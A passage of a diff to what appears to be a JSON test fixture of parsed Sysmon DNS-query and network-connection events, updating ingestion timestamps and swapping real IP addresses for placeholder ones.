Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.pki.goog\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pki-goog.l.google.com;::ffff:172.217.12.195;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802768300Z'/\u003e\u003cEventRecordID\u003e125\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.581\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.pki.goog\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pki-goog.l.google.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -8146,7 +8060,7 @@ ] }, "event": { - "ingested": "2021-06-14T13:23:14.741638600Z", + "ingested": "2021-12-09T13:50:23.457013Z", "code": "3", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e12\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.250\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e10.0.2.255\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -8214,12 +8128,12 @@ "type": "CNAME" }, { - "data": "172.217.10.34", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "172.217.10.34" + "89.160.20.156" ] }, "network": { @@ -8235,13 +8149,13 @@ "googleads4.g.doubleclick.net" ], "ip": [ - "172.217.10.34" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741647300Z", + "ingested": "2021-12-09T13:50:23.457018700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029828800Z'/\u003e\u003cEventRecordID\u003e126\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.872\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003egoogleads4.g.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead.l.doubleclick.net;::ffff:172.217.10.34;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029828800Z'/\u003e\u003cEventRecordID\u003e126\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.872\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003egoogleads4.g.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.029Z", @@ -8323,7 +8237,7 @@ ] }, "event": { - "ingested": "2021-06-14T13:23:14.741655800Z", + "ingested": "2021-12-09T13:50:23.457024700Z", "code": "3", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e13\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.250\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.255\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -8391,27 +8305,27 @@ "type": "CNAME" }, { - "data": "151.101.2.2", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.66.2", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.130.2", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.194.2", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "151.101.2.2", - "151.101.66.2", - "151.101.130.2", - "151.101.194.2" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -8427,16 +8341,13 @@ "images.taboola.com" ], "ip": [ - "151.101.2.2", - "151.101.66.2", - "151.101.130.2", - "151.101.194.2" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741660400Z", + "ingested": "2021-12-09T13:50:23.457030600Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029851300Z'/\u003e\u003cEventRecordID\u003e127\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.889\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eimages.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.taboola.map.fastly.net;::ffff:151.101.2.2;::ffff:151.101.66.2;::ffff:151.101.130.2;::ffff:151.101.194.2;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029851300Z'/\u003e\u003cEventRecordID\u003e127\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.889\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eimages.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.taboola.map.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.029Z", @@ -8512,7 +8423,7 @@ ] }, "event": { - "ingested": "2021-06-14T13:23:14.741666500Z", + "ingested": "2021-12-09T13:50:23.457036400Z", "code": "3", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e14\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.250\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003efe80:0:0:0:e488:b85c:5262:ff86\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e55542\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='DestinationIp'\u003eff02:0:0:0:0:0:1:3\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e5355\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ellmnr\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -8564,15 +8475,15 @@ }, "destination": { "port": 5355, - "ip": "e000:fc:4300:6800:7200:6f00:6d00:6500" + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "source": { "port": 55542, - "ip": "a00:20f:0:0:18a2:6e00:e0:ffff" + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "network": { "protocol": "llmnr", - "community_id": "1:sejGGvgk92xTvKdzlFitndKqdWw=", + "community_id": "1:zjVE29ipqvMTvzEUbTYQ6tGBM08=", "transport": "udp", "type": "ipv6", "direction": "egress" @@ -8586,14 +8497,13 @@ "NETWORK SERVICE" ], "ip": [ - "a00:20f:0:0:18a2:6e00:e0:ffff", - "e000:fc:4300:6800:7200:6f00:6d00:6500" + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741672800Z", + "ingested": "2021-12-09T13:50:23.457042300Z", "code": "3", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e15\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.250\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003ea00:20f:0:0:18a2:6e00:e0:ffff\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e55542\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='DestinationIp'\u003ee000:fc:4300:6800:7200:6f00:6d00:6500\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e5355\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ellmnr\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e15\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.250\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003e2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e55542\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e5355\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ellmnr\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-03-18T16:57:49.340Z", @@ -8642,15 +8552,15 @@ }, "destination": { "port": 137, - "ip": "169.254.255.255" + "ip": "89.160.20.156" }, "source": { "port": 137, - "ip": "169.254.180.25" + "ip": "89.160.20.156" }, "network": { "protocol": "netbios-ns", - "community_id": "1:yP71IXofOTWmF1LG760//yXa4Rk=", + "community_id": "1:fbQ9BbXiy01VWluiIQp2GM9FUAU=", "transport": "udp", "type": "ipv4", "direction": "egress" @@ -8664,14 +8574,13 @@ "SYSTEM" ], "ip": [ - "169.254.180.25", - "169.254.255.255" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741679900Z", + "ingested": "2021-12-09T13:50:23.457048100Z", "code": "3", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e16\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.250\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e169.254.180.25\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e169.254.255.255\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e16\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.250\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData 